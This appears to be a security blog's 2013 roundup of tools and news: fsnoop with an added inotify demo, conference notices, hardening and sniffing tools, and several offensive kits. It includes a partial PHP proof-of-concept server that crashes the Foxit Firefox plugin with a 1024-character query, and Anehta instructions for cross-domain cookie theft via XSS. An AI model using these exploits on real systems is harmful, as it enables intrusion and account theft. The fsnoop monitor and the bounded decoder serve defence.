Tuesday, April 09, 2013

Fsnoop - monitor file operations

Fsnoop is a tool to monitor file operations on GNU/Linux systems. Its primary purpose is to detect bad temporary file usage and, therefore, file race condition vulnerabilities.

Download

Usage

   $ ./fsnoop --help
   fsnoop monitors file operations by using the Inotify mechanism.
   
   Usage: fsnoop [OPTIONS] [DIR1[,DIR2,...]] [-- COMMAND]
  
     -d            Run as a daemon
     -fd           Open file descriptors when it's possible
     -k            Send SIGSTOP signal to the running process (COMMAND)
     -o filename   Output is redirected to a specific file
     -r            Monitor directory contents recursively
     -t            Prefix each line with the time of day
   
   If no DIR is specified, default writable directories such as /tmp,
   /var/tmp, /dev/shm, etc. are monitored.
  
   If COMMAND is specified, it will monitor activities during the process
   duration.

Output

On events, it displays lines as shown below:
   [C] -rw------- 1 root root 0     Tue May  8 22:17:10 2012 /var/tmp/test
   [M] -rw-r--r-- 1 root root 0     Tue May  8 22:17:10 2012 /var/tmp/test
   [U] -rw-r--r-- 1 root root 1741  Tue May  8 22:17:27 2012 /var/tmp/test
   [M] -rwxrwxrwx 1 root root 1741  Tue May  8 22:17:27 2012 /var/tmp/test
   [D] F /var/tmp/test
An event begins with an action character (placed between brackets):
  • 'C' for Create;
  • 'M' for Modify (means that metadata changed, e.g. permissions, timestamps, link count, UID, GID, etc.);
  • 'U' for Update (means that file content was modified);
  • 'D' for Delete.
This is followed by output similar to that of the "ls -l" command, or by a shortened output when fsnoop was not able to stat() the file. In the shortened output, only the file type is displayed ('F' for file and 'D' for directory).

Some examples

To monitor activities in the "/etc" and "/tmp" directories:
   # ./fsnoop /etc,/tmp
   Starting fsnoop version 2.0
   [+] monitor /etc
   [+] monitor /tmp
To run Fsnoop as a daemon in order to monitor the "/var/tmp" directory and record activities in the "/root/fsnoop.log" file:
   # ./fsnoop -d -t -o /root/fsnoop.log /var/tmp
   Starting fsnoop version 2.0 
The output log will look like this:
   # cat /root/fsnoop.log
   [+] monitor /var/tmp
   (20:10:00) [C] -rw-r--r-- 1 root root 0  Mon Jul  9 20:10:00 2012 /var/tmp/blurb-lock
   (20:10:00) [M] -rw-r--r-- 1 root root 0  Mon Jul  9 20:10:00 2012 /var/tmp/blurb-lock
   (20:13:02) [D] F /var/tmp/blurb-lock
To monitor file activity only for the duration of a process:
   $ ./fsnoop /tmp -- Xorg -ac :1
   Starting fsnoop version 2.0
   [+] monitor /tmp
To send the SIGSTOP signal to a process right after an event occurs:
   $ ./fsnoop -k /tmp/.tX1-lock -- Xorg -ac :1
   [...]
   [C] F /tmp/.tX0-lock
   *** PID 30342 stopped, type [Enter] to resume execution:
   *** PID 30342 resumed ...
To read the content of a file after it has been deleted:
   $ ./fsnoop -fd /var/tmp
   [+] monitor /var/tmp
   [+] As then "-fd" option is being used, you can launch new shell by
       using "ctrl-c" and disclose file descriptors content.
   [C] -rw-r--r-- 1 root root 0  Tue Jan  1 21:39:55 2013 /var/tmp/temp.2oPahVp (opened fd=5)
   [U] -rw-r--r-- 1 root root 13  Tue Jan  1 21:40:37 2013 /var/tmp/temp.2oPahVp
   [D] F /var/tmp/temp.2oPahVp
   ^C
   
   Here are opened file descriptors.  You can display their contents by
   using the "cat" command.  For example, to display fd #4 use: "cat <&4"
   
   lrwx------ 1 vladz vladz 64  1 janv. 21:43 0 -> /dev/pts/3
   lr-x------ 1 vladz vladz 64  1 janv. 21:43 5 -> /var/tmp/temp.2oPahVp (deleted)
   fsnoop$ cat <&5
To monitor directories recursively. If /tmp is being monitored recursively and someone runs:
   $ mkdir -p /tmp/a/b/c/d/e/f
   $ touch /tmp/a/b/c/d/e/f/a
the event is caught:
   $ ./fsnoop -r /tmp
   [+] monitor /tmp
   [C] -rw-r--r-- 1 vladz vladz 0  Thu Jan 24 13:10:30 2013 /tmp/a/b/c/d/e/f/a
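To make the mechanism behind the output above concrete, here is an added example written for this page; it is not fsnoop's own code. It uses the same Linux inotify API, labels events with fsnoop's C/M/U/D letters, flags files that are world-writable at event time (the -rwxrwxrwx case in the sample output is the classic bad temp-file pattern), and replays the create/chmod/write/unlink sequence of the sample in a constructed temp directory. It also shows why the "-fd" option works: a descriptor opened when the file is created still reads the content after the [D] event. The ls-like line is simplified to octal mode, uid, gid, size and path; the /tmp path and the file name are constructed for the demo.

```c
/* Added example, not fsnoop's own code: a minimal inotify watcher with fsnoop's
 * C/M/U/D letters, a world-writable check, and the "-fd" trick (a descriptor
 * opened at [C] time still reads the content after [D]). Linux only. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <unistd.h>

#define WATCH_MASK (IN_CREATE | IN_ATTRIB | IN_MODIFY | IN_DELETE)

/* fsnoop's action letter for an inotify event mask. */
char action_char(unsigned mask)
{
    if (mask & IN_CREATE) return 'C';
    if (mask & IN_DELETE) return 'D';
    if (mask & IN_ATTRIB) return 'M';   /* metadata: mode, owner, timestamps */
    if (mask & IN_MODIFY) return 'U';   /* content changed */
    return '?';
}

/* Print one fsnoop-style line for ev (mode uid gid size path). Returns 1 if
 * the file is currently world-writable (the -rwxrwxrwx line above), else 0. */
int report(const char *dir, const struct inotify_event *ev)
{
    char path[PATH_MAX], a = action_char(ev->mask);
    struct stat st;
    snprintf(path, sizeof path, "%s/%s", dir, ev->name);
    if (a != 'D' && stat(path, &st) == 0) {
        printf("[%c] %04o %u %u %lld %s\n", a, (unsigned)(st.st_mode & 07777),
               (unsigned)st.st_uid, (unsigned)st.st_gid, (long long)st.st_size, path);
        return (st.st_mode & S_IWOTH) ? 1 : 0;
    }
    /* shortened output when stat() is impossible, as fsnoop prints after [D] */
    printf("[%c] %c %s\n", a, (ev->mask & IN_ISDIR) ? 'D' : 'F', path);
    return 0;
}

/* Drain the non-blocking inotify fd: one letter per event into seq, return
 * how many events showed a world-writable file. */
int drain(int ifd, const char *dir, char *seq, size_t cap)
{
    char buf[4096] __attribute__((aligned(8)));
    size_t n = strlen(seq); int flagged = 0; ssize_t len;
    while ((len = read(ifd, buf, sizeof buf)) > 0) {
        for (char *p = buf; p < buf + len;) {
            const struct inotify_event *ev = (const struct inotify_event *)p;
            if (n + 1 < cap) seq[n++] = action_char(ev->mask);
            flagged += report(dir, ev);
            p += sizeof *ev + ev->len;
        }
    }
    seq[n] = '\0';
    return flagged;
}

/* Replay create 0600 / chmod 0777 / write / unlink in a constructed temp dir,
 * draining after each step. seq gets "CMUD"; recovered gets what the held
 * descriptor still reads after [D]. Returns 2 (the [M] and [U] sightings)
 * or -1 on setup error. */
int demo(char *seq, size_t cap, char *recovered, size_t rcap)
{
    char dir[] = "/tmp/fsnoop-demo-XXXXXX", file[PATH_MAX];
    int ifd, wd, fd, held, flagged = 0;
    ssize_t got;
    seq[0] = recovered[0] = '\0';
    if (mkdtemp(dir) == NULL) return -1;
    if ((ifd = inotify_init1(IN_NONBLOCK)) < 0) { rmdir(dir); return -1; }
    if ((wd = inotify_add_watch(ifd, dir, WATCH_MASK)) < 0) { close(ifd); rmdir(dir); return -1; }
    snprintf(file, sizeof file, "%s/test", dir);
    fd = open(file, O_CREAT | O_WRONLY, 0600);          /* -> [C] -rw------- */
    held = open(file, O_RDONLY);                         /* what "-fd" keeps */
    if (fd < 0 || held < 0) flagged = -100;
    flagged += drain(ifd, dir, seq, cap);
    fchmod(fd, 0777);                                    /* -> [M] -rwxrwxrwx */
    flagged += drain(ifd, dir, seq, cap);
    if (write(fd, "hello\n", 6) != 6) flagged = -100;    /* -> [U] */
    flagged += drain(ifd, dir, seq, cap);
    close(fd);
    unlink(file);                                        /* -> [D] */
    flagged += drain(ifd, dir, seq, cap);
    /* gone from the directory, yet still readable through the held descriptor */
    got = read(held, recovered, rcap - 1);
    recovered[got > 0 ? got : 0] = '\0';
    close(held); inotify_rm_watch(ifd, wd); close(ifd); rmdir(dir);
    return flagged < 0 ? -1 : flagged;
}

/* 1 when the run matched the sample: CMUD, two sightings, "hello\n" recovered. */
int demo_check(void)
{
    char seq[16], recovered[64];
    int flagged = demo(seq, sizeof seq, recovered, sizeof recovered);
    printf("events=%s world-writable=%d recovered=%s", seq, flagged, recovered);
    return flagged == 2 && strcmp(seq, "CMUD") == 0 && strcmp(recovered, "hello\n") == 0;
}

int main(void) { return demo_check() ? 0 : 1; }
```

Each drain happens right after the operation, so the stat() in report reflects the state at that moment, which is also why fsnoop's own lines are a snapshot: the [C] line shows 0600 and only the later [M] and [U] lines show the world-writable mode. Run it as an unprivileged user; it needs only inotify and a writable /tmp.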

Credits

Thanks to Larry Cashdollar for testing the tool and bringing new ideas.

Workshop Proposal Submission Deadline ( Security Focus )

Workshop Proposal Submission Deadline: April 15, 2013
------------------------------------------------------------------------
Paper Submission Deadline: June 1, 2013
----------------------------------------------------------------------
Washington D.C. USA, September 8-14, 2013.
http://www.asesite.org/events/washington2013/
-------------------------------------------------------------------------

1.      2013 ASE/IEEE International Conference on Big Data
             http://www.asesite.org/conferences/bigdata/2013/

2.      2013 ASE/IEEE International Conference on Social Computing
             http://www.asesite.org/conferences/socialcom/2013/

3.      2013 ASE/IEEE International Conference on Economic Computing
             http://www.asesite.org/conferences/econcom/2013/

4.      2013 ASE/IEEE International Conference on Biomedical Computing
             http://www.asesite.org/conferences/biomedcom/2013/

5.      2013 ASE/IEEE International Conference on Privacy, Security, Risk and Trust
            http://www.asesite.org/conferences/passat/2013/

EC-Council Conferences & Events

Thank you so much for your participation in EC-Council's certification programs! We are proud to officially announce our 2012 Schedule of Events! EC-Council events are designed to provide you with the best speakers, cutting edge topics, beginning through advanced hacking courses and of course a ton of Continuing Education credits!

If you haven't already registered, don't hesitate as 2013 will offer more events in more locations than any previous year in EC-Council history!

See you there,  
Eric Lopez, Senior Director, Conference & Events


TakeDownCon St. Louis 
Hosted by EC-Council and one of our top partners, Parameter Security, this two-day conference will feature a split agenda of Security Briefs followed by "Deep Dive" Hacking Clinics! [Advanced hacking courses such as
"Advanced Mobile Hacking Forensics," will be offered Pre-Conference & include access to the main event!]

St. Louis CISO Summit
Strictly for top Information Security executives, apply to attend this prestigious, invite-only event for a mix of keynotes, panel discussions, networking, and live demos covering the most pressing and relevant IS issues.

Rocket City TakeDownCon 
Hosted by EC-Council and one of our top partners, Dynetics, this two-day conference will feature a day of Defensive Briefs and a day of Offensive Briefs! [Advanced hacking courses such as "Advanced Metasploit Hacking" will be offered Pre-Conference & include access to the main event!]

Hacker Halted
Mark your calendars and check back at this website because in staying with our theme, "The Hacker Code; Angels vs Demons," we will be running a massive scavenger hunt with our vendors, a hacking contest and an onsite treasure hunt which will qualify you to enter into a drawing for the largest CASH giveaway Hacker Halted has ever offered! This year will also host the Global Cyberlympics, Global CISO Forum, and onsite hacking challenge and over 50 amazing presenters, and as always, the best Advanced Hacker courses in the industry!

Global CISO Forum
The biggest CISO conference of the year - don't miss this executive-level, invite-only event including high-level information security program management, networking, and demonstrations. 

Global CyberLympics
The EC-Council Foundation is proud to announce that the Cyberlympics freshman year was a huge success with over 400 teams competing from 52 countries! 2013 is already shaping up to be bigger and more exciting than we have previously thought possible. We will begin our first of three regional "Elimination" rounds in July so if you think you have some hacking skills and can compete with last year's Reigning champions, Deloitte's HHCK.ers from the Netherlands, sign up now to get registered! 

Bitmessage - encrypted messaging

Bitmessage is a P2P communications protocol used to send encrypted messages to another person or to many subscribers. It is decentralized and trustless, meaning that you need not inherently trust any entities such as root certificate authorities.

It uses strong authentication, which means that the sender of a message cannot be spoofed, and it aims to hide "non-content" data, such as the sender and receiver of messages, from passive eavesdroppers like those running warrantless wiretapping programs.

An open source client is available for free under the very liberal MIT license. For screenshots and a description of the client, see this CryptoJunky article: "Setting up and using Bitmessage".

Download: https://bitmessage.org/wiki/Main_Page

Sunday, January 20, 2013

Penetration test report template

Good afternoon, everyone!

- Many people ask me about working in information security, about implementing IDS, IPS and high-availability networks, and about the advantages and disadvantages of choosing only this field. As in any other field, the path is hard: certifications and degrees are decisive for professional success, and why not personal success too (NLP), as I mentioned in a previous post.

- I follow the posts on Dragonjar closely; he has about 10 years of experience in the field, and not just because of "l33tmothafoker hacking oldschool" posts, but because of what he contributes to the community. I thought it important to share some material on penetration test report templates, without further ado.

Here it is:


Server Shield - Linux hardening

Features
  • Firewall Hardening
  • TCP Hardening
  • Data Leakage Protection
  • ICMP/Ping Flood Protection
  • Rootkit Protection
  • DoS Protection
  • Spoof Protection
  • Bogus TCP Protection
  • SYN Flood Protection
Requires
  • iptables ("yum install iptables")
Installation
   git clone https://github.com/Brian-Holt/server-shield
   cd server-shield; chmod +x sshield; mv sshield /etc/init.d
   /etc/init.d/sshield start

Download Server Shield v1.0.2

Junkie - The Network Sniffer

At the heart of SecurActive's network performance monitoring application lies a real-time packet sniffer and analyzer. Modular enough to accomplish many different tasks, we believe this tool can be a helpful companion to the modern network administrator and analyst, and so we decided to offer it to the public under a liberal license so that the Open Source community can use it, play with it, and extend it with whatever feature is deemed appropriate.
Compared to previously available tools, junkie lies between tcpdump and wireshark. Unlike tcpdump, its purpose is to parse protocols to any depth; unlike wireshark, though, junkie is designed to analyze traffic in real time and so cannot parse traffic as completely as wireshark does.
In addition, junkie's design encompasses extensibility and speed:
  • plug-in system + high-level extension language that eases the development and combination of new functionalities;
  • threaded packet capture and analysis for handling high-bandwidth networks;
  • modular architecture to ease the addition of any protocol layer;
  • based on libpcap for portability;
  • well tested in professional settings.
Junkie is still being maintained and extended by SecurActive's dedicated team, but we believe it can be further extended to fulfill many unforeseen purposes.

Todo

Protocol discovery

  • Automatically convert from bro/l7-filter/snort filters to junkie protocol discovery
  • When we find out a proto for TCP (that we know how to parse), register it both ways (using the connection tracking hash?)

Netmatch language

  • a type for signed integers (in a way or another - maybe the few operators that really care should exist in two variants?);
  • another special form for converting a name to an ip_addr (or a regular function if we optimize constant away from runtime exec - see below about purity);
  • pure functions taking only constants (and thus returning a constant) should be precomputed;
  • a slice operator to extract a string from another string;
  • it should be correct to match with: (eth) ((ip) (...) or (arp) (...)). in other words, the proto list should be a special form (binding current protos) rather than a fixed preamble.
  • a list of every valid fields (with a docstrings) for better error messages;
  • a higher level language resembling wireshark's, with automatic insertion of set? predicates;

Nettrack language

  • A www plugin to display each netgraph state;
  • rehashable states (once the global hash has been refactored into an incrementally resized hash)

Reports

A plugin to use the aforementioned FSM executable rules to build reports that help classify traffic;

Netflow

Using the above report facility, produce netflow statistics (and stream it).

Minor

  • the writer www plugin must mergecap fragmented pcap files for download;
  • automatic resolution of inter-module dependencies during init;

Parsers for:


Anehta V-0.6 - Web Application Security Audit Tool

Anehta is a Web Application Security Audit Tool written in PHP/JavaScript, designed to make cross-site scripting and other web attacks easier and more automated.

Install and configure:
1. Decompress all the files into a directory on your server.
2. Make sure your directory has write permission.
3. Modify $U as the username and $P as the password in the "server/class/auth_Class.php" file.
   The default username is "admin" and the default password is "123456".
4. If you want to send mail, modify the "server/mail.php" file to point to your own mail server or mailbox.

Quick start:
1. Log in and go to the Configure tab.
2. Enter the "anehtaurl" as the address where your anehta is.
   For example: "http://www.a.com/anehta".
3. You should also enter the boomerang src and boomerang target.
   boomerang src is usually the same page where you put your feed.js.
   For example: boomerang src may be: "http://www.b.com/xssed.html?param=".
   boomerang target must be the page from which you want to steal the cross-domain cookie.
   For example: boomerang target may be: "http://www.alimafia.com/xssDemo.html#'><'".
   You can modify feed.js to disable the xcookie module if you do not want to use boomerang. But you must always set the boomerang src and target values when you modify the Configure tab.

4. After modifying the configuration, simply load feed.js as an external script in your xss page. There is also a demo page in the directory, "demo.html".
5. Refresh admin.php, and you will see changes as your xss slaves come in.

Download: 
File:
  anehta-v0.6.0.rar   4.6 MB
Description:
=== Environment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS

=== Install & Configure ===
1. Decompress all the files into a directory on your server.
2. Make sure your directory has write permission.
3. Modify $U as the username and $P as the password in the "server/class/auth_Class.php" file.
   The default username is "admin" and the default password is "123456".
4. If you want to send mail, modify the "server/mail.php" file to point to your own mail server or mailbox.

=== Quick Start ===
1. Log in and go to the Configure tab.
2. Input the "anehtaurl" as the URL where your anehta is.
   For example: "http://www.a.com/anehta".
3. You should also input the boomerang src and boomerang target.
   boomerang src is usually the same page where you put your feed.js.
   For example: boomerang src may be: "http://www.b.com/xssed.html?param=".

   boomerang target must be the page from which you want to steal the cross-domain cookie.
   For example: boomerang target may be: "http://www.alimafia.com/xssDemo.html#'><'".

   You can modify feed.js to disable the xcookie module if you do not want to use boomerang.
   But you must always set the boomerang src and target values when you modify them in the Configure tab.

4. After modifying the configuration, simply load feed.js as an external script in your xss page.
   There is also a demo page in the directory, "demo.html".

5. Refresh admin.php, and you may see some changes as your xss slaves come in.

=== More Support ===
Home page: http://anehta.googlecode.com
Blog: http://hi.baidu.com/aullik5  (Many Docs here)
Demo Video: http://hi.baidu.com/aullik5/blog/item/cb4cd5899283b093a4c272a9.html

Author: axis@ph4nt0m.org

Feel free to give me your advice.
SHA1 Checksum: 623853b2d834e696b4c264c22ef877ecfa588fbb

Pentoo - Security Focused Livecd

Pentoo is a security-focused livecd based on Gentoo. It's basically a Gentoo install with lots of customized tools, a customized kernel, and much more. Here is a non-exhaustive list of the features currently included:
  • Kernel 2.6.31.6 with lzma and aufs patches
  • Wifi stack 2.6.32_rc7
  • Module loading support à la Slax
  • Saving of changes on a USB stick
  • Enlightenment DR17 WM
  • Cuda/OpenCL cracking support with development tools
  • System updates once you finally have it installed
Put simply, Pentoo is Gentoo with the pentoo overlay. This overlay is available in layman, so all you have to do is layman -L and layman -a pentoo.

Bizploit - ERP Penetration Testing framework

Onapsis Bizploit

Bizploit is the first open source ERP Penetration Testing framework. Developed by the Onapsis Research Labs, Bizploit assists security professionals in the discovery, exploration, vulnerability assessment and exploitation phases of specialized ERP Penetration Tests.
Currently, Bizploit is shipped with many plugins to assess the security of SAP business platforms. Plugins for other popular ERPs will be included in the short term.
  • Download Bizploit v1.50-rc1 for Windows
  • Download Bizploit v1.50-rc1 for Linux

browser-in-the-middle, I love IT! :D

browser-in-the-middle is a bash script that uses ettercap, metasploit and the BeEF framework to perform attacks that inject code into pages users visit on the internet from the local network.
- uses ettercap to launch a man-in-the-middle attack
- ettercap modifies traffic so evil JavaScript or iframes are added
- the victim's browser is redirected to the attacker's web server
- the web server runs the msf autopwn module or the BeEF framework to launch browser exploits or other browser-related attacks.

File:
  browser_autopwn.sh   1.9 KB
Description:
Not working bash script to test if I can upload files.
SHA1 Checksum: 0fe79f78dd385433edb70279306fc4974b9f0c77



Wifi Honey - creating fake APs (:

I'll leave the original description (:

This is a script an attacker can use to create fake APs using all encryption types and monitor them with Airodump. It automates the setup process: it creates five monitor mode interfaces, four are used as APs and the fifth is used for airodump-ng. To make things easier, rather than having five windows, all this is done in a screen session which allows you to switch between screens to see what is going on. All sessions are labelled so you know which is which.
Running wifi honey
chmod a+x wifi_honey.sh
./wifi_honey.sh fake_wpa_net

./wifi_honey.sh fake_wpa_net 1 waln1
Download Wifi Honey


WPSCRACKGUI - Graphical tool for cracking WPS Wireless PINs

Changelog v1.2.1:
* Added the Portuguese language.
* Added the Kozumi Keygen.
* Added the Edimax Keygen.
* Added the Belkin Keygen.
* Added the Nisuta Keygen.
* Updated database to: 301 PINs, 120 MAC addresses.
* Fixed bugs in general.
Graphical interface for the WPS network cracking tool Reaver.
Features:
  • Graphic User Interface (GUI) WPS encryption cracking.
  • Advanced Attack with Generic Dictionary.
  • Advanced Dictionary Attack with Enhanced.
  • Updated Assisted Reaver-WPS.
  • Database with PINs.
  • Change MAC Address.
  • Supported in Gt and Gtk.
  • Scan networks.


Critical vulnerability in the Foxit PDF plugin for Firefox

For some time now I have used Foxit Reader as my default PDF reader: it is light, fast and uses fewer resources than Adobe Reader. Besides, malware keeps lashing Adobe out of simple war economics: most users use it, so it is more likely to spread. Can I then wrap myself in my bathrobe, stoke the fireplace and sing the slogan "I feel saaafe"? Far from it...

Since Adobe Reader X, Adobe has focused on security, applying patch after patch for the multiple vulnerabilities discovered by an army of beta testers eager to open the doors for their malicious artifacts. So perhaps Foxit Reader is not public enemy number one, but that does not make it any more secure.

The Italian consultant Andrea Micalizzi, aka rgod, reminded us of this recently by publishing a vulnerability that affects, yes, the Foxit PDF plugin for the browser. That is, the bug is not in the PDF reader itself but in the npFoxitReaderPlugin.dll library, which acts as an intermediary between the browser and Foxit Reader.

Specifically, the code is vulnerable to a stack overflow when processing overlong URL requests. The proof of concept is clear: it currently works against the latest version of Firefox (18.0) and the latest version of Foxit Reader (5.4.4.1128) with its plugin (2.2.1.530).
Let's look at rgod's code:

   <?php /*

   Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll
   Overlong Query String Remote Stack Buffer Overflow PoC
   rgod
   ---------------------------

   (listener)

   Tested against Microsoft Windows
   Mozilla Firefox 17.0.1
   Foxit Reader 5.4.3.0920
   Foxit Reader 5.4.4.1128

   File: npFoxitReaderPlugin.dll
   Version: 2.2.1.530

   Product url: http://www.foxitsoftware.com/downloads/
   Latest version setup file: FoxitReader544.11281_enu_Setup.exe

   Usage:
   launch from the command line, then browse to port 6666 with Firefox.
   You can also test it through the web site:

   http://192.168.0.1/x.pdf?[A x 1024]

   The file must exist or the server must respond with the proper
   Content-Type header.

   vulnerable code, npFoxitReaderPlugin.dll:

   ,------------------------------------------------------------------------------
    L1000162F:
       push ebx
       push esi
       push edi
       mov edi, ebp
       or ecx, FFFFFFFFh
       xor eax, eax
       xor ebx, ebx
       xor esi, esi
       repne scasb
       not ecx
       dec ecx
       test ecx, ecx
       jle L100016E4
    L1000164A:
       mov al, [esi+ebp]
       mov word ptr [esp+18h], 0000h
       cmp al, 25h
       jz L10001661
       mov ecx, [esp+1Ch]
       mov [ebx+ecx], al
       jmp L100016CE
    L10001661:
       mov al, [esi+ebp+01h]
       cmp al, 30h
       jl L1000166D
       cmp al, 39h
       jle L1000167D
    L1000166D:
       cmp al, 41h
       jl L10001675
       cmp al, 46h
       jle L1000167D
    L10001675:
       cmp al, 61h
       jl L100016C6
       cmp al, 66h
       jg L100016C6
    L1000167D:
       mov dl, [esi+ebp+01h]
       inc esi
       inc esi
       lea ecx, [esp+10h]
       mov [esp+18h], dl
       push ecx
       mov al, [esi+ebp]
       lea edx, [esp+1Ch]
       push L100450D4
       push edx
       mov [esp+25h], al
       call SUB_L10006421
       mov eax, [esp+1Ch]
       lea ecx, [esp+24h]
       push eax
       push L100450D0
       push ecx
       call SUB_L100063CF
       mov eax, [esp+34h]
       mov dl, [esp+30h]
       add esp, 00000018h
       mov [ebx+eax], dl
       jmp L100016CE
    L100016C6:
       mov ecx, [esp+1Ch]
       mov byte ptr [ebx+ecx], 25h
    L100016CE:
       inc ebx
       mov edi, ebp
       or ecx, FFFFFFFFh
       xor eax, eax
       inc esi
       repne scasb
       not ecx
       dec ecx
       cmp esi, ecx
       jl L1000164A
    L100016E4:
       mov edx, [esp+1Ch]
       pop edi
       pop esi
       mov eax, 00000001h
       mov byte ptr [ebx+edx], 00h
       pop ebx
       pop ebp
       pop ecx
       retn
   ,------------------------------------------------------------------------------

   this copy loop ends up overwriting stack pointers, then
   (when attaching to plugin-container.exe):

   (f48.1778): Access violation - code c0000005 (first chance)
   First chance exceptions are reported before any exception handling.
   This exception may be expected and handled.
   eax=00000341 ebx=0076ed4c ecx=002cf414 edx=0076e9e8 esi=41414141 edi=002cf414
   eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0         nv up ei pl nz na po nc
   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
   npFoxitReaderPlugin!NP_GetEntryPoints+0x15672:
   10016852 8906            mov     dword ptr [esi],eax  ds:0023:41414141=????????
   ...
   Attempt to write to address 41414141
   ...

   SEH pointers are overwritten as well
   */

   error_reporting(0);
   set_time_limit(0);

   $port = 6666;

   $____redirect = "HTTP/1.1 301 Moved Permanently\r\n".
                   "Server: Apache\r\n".
                   "Location: /x.pdf?".str_repeat("A", 1024)."\r\n".
                   "Content-Type: text/html\r\n\r\n";

   $____crescimento = "HTTP/1.1 200 OK\r\n".
                   "Server: Apache\r\n".
                   "Accept-Ranges: bytes\r\n".
                   "Content-Length: 60137\r\n".
                   "Content-Type: application/pdf\r\n".
                   "Connection: keep-alive\r\n\r\n";

   $socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);

   if (!$socket) {
     echo "$errstr ($errno)\n";
   } else {
     echo "listening on public tcp port ".$port."\n";
     while ($conn = stream_socket_accept($socket)) {
       $line = fgets($conn);
       [...]



Now run the PHP file (x.php in my example) from the command line of our Windows 7 box:

   D:\xampplite\htdocs>d:\xampplite\php\php.exe -f x.php
   listening on public tcp port 6666
   GET /x.pdf?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
And finally, point the browser at that address and port:

As you can see, we crashed the plugin without breaking a sweat...
There is currently no update that fixes it, and other versions of Foxit Reader and other browsers (Firefox, Chrome and Safari) may be vulnerable, so it is advisable to disable the plugin until further notice:

Once disabled, PDF files will no longer open directly in the browser but will be loaded in a new Foxit Reader process, thus avoiding the vulnerable plugin DLL.
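The code-level counterpart of that mitigation, as an added example that is neither rgod's PoC nor Foxit's code: the disassembly above is a "%XY" decoding loop that copies the query string into a fixed-size stack buffer and never compares the output index (ebx) against the buffer's size, which is what the overlong query exploits. The decoder below follows the same rules visible in the listing (two hex digits after '%' become one byte, a lone '%' is copied literally) but takes the destination capacity and refuses input that would not fit. The 256-byte destination is an assumption for the demo; the page does not give the real buffer size. It is slightly stricter than the original loop, which validates only the first hex digit.

```c
/* Added example, not from rgod's PoC or Foxit's code: the percent-decoding
 * loop disassembled above, written with the bounds check that loop lacks.
 * The 256-byte destination used in the demo is an assumption. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Value of a hex digit, or -1. The original loop accepts 0-9, A-F and a-f. */
int hexval(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode src into dst (capacity cap). "%XY" with two hex digits becomes one
 * byte; a '%' not followed by hex digits is copied literally, like the
 * "mov byte ptr [ebx+ecx], 25h" path in the listing. Never writes past
 * dst[cap-1]: returns the decoded length, or -1 (and an empty dst) when the
 * output would not fit. The disassembled loop has no such check. */
int url_decode_bounded(char *dst, size_t cap, const char *src)
{
    size_t n = 0;
    if (cap == 0) return -1;
    while (*src) {
        unsigned char out;
        if (src[0] == '%' && hexval(src[1]) >= 0 && hexval(src[2]) >= 0) {
            out = (unsigned char)(hexval(src[1]) * 16 + hexval(src[2]));
            src += 3;
        } else {
            out = (unsigned char)*src++;
        }
        if (n + 1 >= cap) { dst[0] = '\0'; return -1; }  /* the missing check */
        dst[n++] = (char)out;
    }
    dst[n] = '\0';
    return (int)n;
}

/* Ordinary request (constructed): 1 if "x.pdf%3Fa%3db%" decodes to
 * "x.pdf?a=b%", i.e. escapes decoded and the dangling '%' kept literally. */
int demo_decode_ok(void)
{
    char buf[32];
    int len = url_decode_bounded(buf, sizeof buf, "x.pdf%3Fa%3db%");
    return len == 10 && strcmp(buf, "x.pdf?a=b%") == 0;
}

/* The PoC's query shape (1024 'A's) against an assumed 256-byte buffer:
 * returns the decoder's verdict, -1, instead of running off the stack. */
int demo_reject_overlong(void)
{
    char query[1024 + 1], buf[256];
    memset(query, 'A', 1024);
    query[1024] = '\0';
    return url_decode_bounded(buf, sizeof buf, query);
}

int main(void)
{
    printf("decode ok: %d, overlong rejected: %d\n",
           demo_decode_ok(), demo_reject_overlong() == -1);
    return 0;
}
```

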